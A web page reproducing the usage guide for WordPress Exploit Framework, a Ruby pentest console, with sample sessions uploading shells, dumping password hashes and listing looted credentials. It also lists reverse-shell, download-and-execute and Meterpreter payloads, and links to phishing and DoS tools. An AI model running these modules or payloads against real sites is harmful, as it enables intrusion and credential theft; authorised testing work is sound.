WordPress Exploit Framework - A Ruby Tool For Wordpress Penetration Testing
WordPress Exploit Framework is an open source framework that is designed to aid in the penetration testing of WordPress systems.
Requirements:
- Ruby >= 2.4.4
How To Install WordPress Exploit Framework
To install the latest stable build, run gem install wpxf .
After installation, you can launch the WordPress Exploit Framework console by running wpxf .
Debian Systems:
If you have issues installing WPXF's dependencies (in particular, Nokogiri), first make sure you have all the tooling necessary to compile C extensions:sudo apt-get install build-essential patch
It's possible that you don't have important development header files installed on your system. Here's what you should do if you should find yourself in this situation:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev
If you are experiencing errors that indicate that libcurl.dll could not be loaded, you will need to ensure the latest libcurl binary is included in your Ruby bin folder, or any other folder that is in your environment's PATH variable.
The latest version can be downloaded from curl.haxx.se/download.html. As of 16/05/2016, the latest release is marked as Win32 2000/XP zip 7.40.0 libcurl SSL . After downloading the archive, extract the contents of the bin directory into your Ruby bin directory (if prompted, don't overwrite any existing DLLs).
How To Use WordPress Exploit Framework
Start the WordPress Exploit Framework console by running wpxf .Once loaded, you'll be presented with the wpxf prompt, from here you can search for modules using the search command or load a module using the use command.
Loading a module into your environment will allow you to set options with the set command and view information about the module using info .
Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options and run the exploit against the target.
wpxf > use exploit/shell/symposium_shell_upload [+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20> wpxf [exploit/shell/symposium_shell_upload] > set host wp-sandbox [+] Set host => wp-sandbox wpxf [exploit/shell/symposium_shell_upload] > set target_uri /wordpress/ [+] Set target_uri => /wordpress/ wpxf [exploit/shell/symposium_shell_upload] > set payload exec [+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078> wpxf [exploit/shell/symposium_shell_upload] > set cmd echo "Hello, world!" [+] Set cmd => echo "Hello, world!" wpxf [exploit/shell/symposium_shell_upload] > run [-] Preparing payload... [-] Uploading the payload... [-] Executing the payload... [+] Result: Hello, world! [+] Execution finished successfully
Supported Commands:
- back
Changes the context of the session back to before loading the current module.
wpxf [exploit/shell/admin_shell_upload] > back wpxf >
- check
Check if the currently loaded module can be used against the specified target.
wpxf [exploit/shell/admin_shell_upload] > check [!] Target appears to be vulnerable wpxf [exploit/shell/admin_shell_upload] >
- clear
Clear the screen.
- creds
List the credentials stored in the current workspace.
wpxf > creds ID Host Username Password Type -- --------------- -------- -------- ----- 13 wordpress.vm:80 root toor plain 14 wordpress.vm:80 test plain wpxf >
- creds -d [id]
Delete the credential with the matching [id] number.
wpxf > creds -d 8 [+] Deleted credential 8 wpxf >
- gset
Set an option value globally, so that the current module and all modules loaded afterwards will use the specified value for the specified option.
wpxf > gset host wordpress.vm
[+] Globally set the value of host to wordpress.vm
wpxf > use exploit/shell/admin_shell_upload
[+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3578af0>
wpxf [exploit/shell/admin_shell_upload] > show options
Module options:
Name Current Setting Required Description
------------------- --------------- -------- -------------------------------------------
host wordpress.vm true Address of the target host.
http_client_timeout 5 true Max wait time in seconds for HTTP responses
password true The WordPress password to authenticate with
port 80 true Port the remote host is listening on
proxy false Proxy address ([protocol://]host:port)
ssl false true Use SSL/HTTPS for all requests
target_uri / true Base path to the WordPress application
username true The WordPress username to authenticate with
verbose false true Enable verbose output
vhost false HTTP server virtual host
wpxf [exploit/shell/admin_shell_upload] >
- gunset
Unset a global option set with the gset command.
wpxf > gunset host [+] Removed the global setting for host wpxf >
- info
wpxf [exploit/shell/admin_shell_upload] > info
Name: Admin Shell Upload
Module: exploit/shell/admin_shell_upload
Disclosed: 2015-02-21
Provided by:
rastating
Module options:
Name Current Setting Required Description
---------- --------------- -------- -------------------------------------------
host wordpress.vm true Address of the target host.
password toor true The WordPress password to authenticate with
port 80 true Port the remote host is listening on
proxy false Proxy address ([protocol://]host:port)
ssl false true Use SSL/HTTPS for all requests
target_uri / true Base path to the WordPress application
username root true The WordPress username to authenticate with
verbose false true Enable verbose output
vhost false HTTP server virtual host
Description:
This module will generate a plugin, pack the payload into it and upload it to
a server running WordPress; providing valid admin credentials are used.
wpxf [exploit/shell/admin_shell_upload] >
- loot
List the loot collected from targets in the current workspace.
wpxf > loot ID Host Filename Notes Type -- --------------- ----------------------- ------------------------------------- --------- 1 wordpress.vm:80 2018-07-14_15-00-56.csv Registered users and e-mail addresses user list All filenames are relative to /home/rastating/.wpxf/loot wpxf >
- loot -d [id]
Delete the loot item with the matching [id] number.
wpxf > loot -d 1 [+] Deleted item 1 wpxf >
- loot -p [id]
wpxf > loot -p 2 Email,Name "lPBrOHC@mBeTjaAGGh.com","atgvrf" "gSLzaYG@uZVUAeSJvj.com","dowzvc" "AMfWgAH@uDNuULjBQv.com","efhkjv" "halFIgH@CYqrzDzwQU.com","omquqt" "root@wordpress.vm","root" wpxf >
- quit
Exit the WordPress Exploit Framework prompt.
- rebuild_cache
Re-build the module cache.
wpxf > rebuild_cache [!] Refreshing the module cache... wpxf >
- run
Run the currently loaded module.
wpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] > run
[-] Determining database prefix...
[-] Dumping user hashes...
Username Hash
-------- -----------------------------------
root $P$BqL7kZ\/A30CnAbIriSrXRmKvY9ynx80
ATgVrF $P$Bc5VwreNVctuXYwqKuN0IOWiDib79g.
DOWzVC $P$BwtOdeIGMW.jR7\/zfzMp.kc4FJcPwB.
OmQUqt $P$BOUcq9FWVxEyyrqyZNApW79kgPm7wq\/
eFhkJv $P$B1h9aF1cYdIBnAoh9F6NkchHXlTMpe.
[+] Execution finished successfully
wpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] >
- set
Set an option value for the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > set host wordpress.vm [+] Set host => wordpress.vm wpxf [exploit/shell/admin_shell_upload] >
- setg
Alias for gset.
- search
Search for modules that contain one or more of the specified keywords.
wpxf > search rfi
[+] 3 Results for "rfi"
Module Title
-------------------------------------------------- ----------------------------------------
exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload Fast Image Adder <= 1.1 RFI Shell Upload
exploit/rfi/flickr_picture_backup_rfi_shell_upload Flickr Picture Backup RFI Shell Upload
exploit/rfi/wp_mobile_detector_rfi_shell_upload WP Mobile Detector RFI Shell Upload
wpxf >
- show advanced
Show the advanced options of the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > show advanced Name: basic_auth_creds Current setting: Required: false Description: HTTP basic auth credentials (username:password) Name: follow_http_redirection Current setting: true Required: true Description: Automatically follow HTTP redirections Name: max_http_concurrency Current setting: 20 Required: true Description: Max number of HTTP requests that can be made in parallel (Min: 1, Max: 200) Name: proxy_auth_creds Current setting: Required: false Description: Proxy server credentials (username:password) Name: user_agent Current setting: Mozilla/5.0 (Macintosh; U; U; Intel Mac OS X 10_7_6 rv:6.0; en-US) AppleWebKit/533.49.6 (KHTML, like Gecko) Version/4.0.2 Safari/533.49.6 Required: false Description: The user agent string to send with all requests Name: verify_host Current setting: true Required: true Description: Enable host verification when using HTTPS Name: wp_content_dir Current setting: wp-content Required: true Description: The name of the wp-content directory. wpxf [exploit/shell/admin_shell_upload] >
- show auxiliary
Show the list of available auxiliary modules.
wpxf > show auxiliary
[+] 58 Auxiliaries
Module Title
-------------------------------------- -----------------------------------------------------------
auxiliary/dos/load_scripts_dos WordPress "load-scripts.php" DoS
auxiliary/dos/long_password_dos Long Password DoS
auxiliary/dos/post_grid_file_deletion Post Grid <= 2.0.12 Unauthenticated Arbitrary File Deletion
auxiliary/dos/wp_v4.7.2_csrf_dos WordPress 4.2-4.7.2 - CSRF DoS
...
wpxf >
- show exploits
Show the list of available exploits.
wpxf > show exploits
[+] 289 Exploits
Module Title
-------------------------------------------------------- --------------------------------------------
exploit/rfi/advanced_custom_fields_remote_file_inclusion Advanced Custom Fields Remote File Inclusion
exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload Fast Image Adder <= 1.1 RFI Shell Upload
exploit/rfi/flickr_picture_backup_rfi_shell_upload Flickr Picture Backup RFI Shell Upload
exploit/rfi/gwolle_guestbook_remote_file_inclusion Gwolle Guestbook Remote File Inclusion
exploit/rfi/wp_mobile_detector_rfi_shell_upload WP Mobile Detector RFI Shell Upload
...
wpxf >
- show options
Show the basic options of the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > show options
Module options:
Name Current Setting Required Description
------------------- --------------- -------- -------------------------------------------
host wordpress.vm true Address of the target host.
http_client_timeout 5 true Max wait time in seconds for HTTP responses
password true The WordPress password to authenticate with
port 80 true Port the remote host is listening on
proxy false Proxy address ([protocol://]host:port)
ssl false true Use SSL/HTTPS for all requests
target_uri / true Base path to the WordPress application
username true The WordPress username to authenticate with
verbose false true Enable verbose output
vhost false HTTP server virtual host
wpxf [exploit/shell/admin_shell_upload] >
- unset
Unset an option set with the set command.
wpxf [exploit/shell/admin_shell_upload] > unset host [+] Unset host wpxf [exploit/shell/admin_shell_upload] >
- unsetg
Alias for gunset.
- use
Load the specified module into the current context.
wpxf > use exploit/shell/admin_shell_upload [+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3af1100> wpxf [exploit/shell/admin_shell_upload] >
- workspace
wpxf > workspace [-] default (active) [-] test wpxf >
- workspace [name]
Switch to the [name] workspace.
Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.
wpxf > workspace test [+] Switched to workspace: test wpxf >
- workspace -a [name]
Add a new workspace.
wpxf > workspace -a wiki [+] Added workspace: wiki wpxf >
- workspace -d [name]
Delete the [name] workspace.
wpxf > workspace -d wiki
[+] Deleted workspace: wiki
wpxf >
Difference Between Auxiliary and Exploit Modules
Auxiliary modules do not allow you to run payloads on the target machine, but instead allow you to extract information from the target, escalate privileges or provide denial of service functionality.Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.
Available Payloads
- bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
- custom: uploads and executes a custom PHP script.
- download_exec: downloads and runs a remote executable file.
- meterpreter_bind_tcp: a Meterpreter bind TCP payload generated using msfvenom.
- meterpreter_reverse_tcp: a Meterpreter reverse TCP payload generated using msfvenom.
- exec: runs a shell command on the remote server and returns the output to the WPXF session.
- reverse_tcp: uploads a script that will establish a reverse TCP shell.
You might also like:
- Wifiphisher - Automated Phishing Attacks Against WiFi Networks
- OnionShare - Tool For Sharing Files Securely and Anonymously (Windows, Linux, Mac OS X)
- HULK - Web Server DoS (Denial of Service) Tool
- Router Password Kracker - Tool For Cracking Router/Modem/Website Passwords
- SecLists - The Pentesters Companion
- CookieCatcher - Tool For Hijacking Sessions Using XSS
- OWASP Bricks - Web Application Security Learning Platform
- PunkSPIDER - Web Application Vulnerability Search Engine
- ADHD - An Ubuntu Based Security Distribution
- Wifislax - A Slackware-Based Penetration Testing Distribution
- WiFinspect - An Android Tool For WiFi Network Monitoring and Auditing
- 31 Best Sites To Receive SMS Online Without a Phone
- How To Spoof Caller ID
Post a Comment